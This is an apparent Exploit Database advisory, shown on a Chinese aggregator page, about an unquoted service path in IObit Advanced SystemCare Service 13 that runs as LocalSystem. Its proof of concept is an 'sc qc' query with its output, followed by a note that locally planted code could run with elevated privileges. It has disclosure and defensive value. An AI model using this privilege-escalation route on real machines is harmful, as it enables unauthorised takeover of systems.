Advanced System Care Service 13 – ‘AdvancedSystemCareService13’ Unquoted Service Path

• Exploit Database
• 36 阅读

• 作者： Jair Amezcua
  日期： 2020-11-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49049/

• # Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
  # Author: Jair Amezcua
  # Date: 2020-11-10
  # Vendor Homepage: https://www.iobit.com
  # Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
  # Version : 13.0.0.157
  # Tested on: Windows 10 64bit(EN)
  # CVE : N/A
  
  # 1. Description:
  # Unquoted service paths in Advanced System Care Service 13v13.0.0.157 have an unquoted service path.
  
  # PoC
  ===========
  
  C:\>sc qc AdvancedSystemCareService13
  [SC] QueryServiceConfig SUCCESS
  SERVICE_NAME: AdvancedSystemCareService13
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
  LOAD_ORDER_GROUP : System Reserved
  TAG: 0
  DISPLAY_NAME : Advanced SystemCare Service 13
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  
  
  #Description Exploit:
  # A successful attempt would require the local user to be able to insert their code in the system root path 
  # undetected by the OS or other security applications where it could potentially be executed during 
  # application startup or reboot. If successful, the local user's code would execute with the elevated 
  # privileges of the application.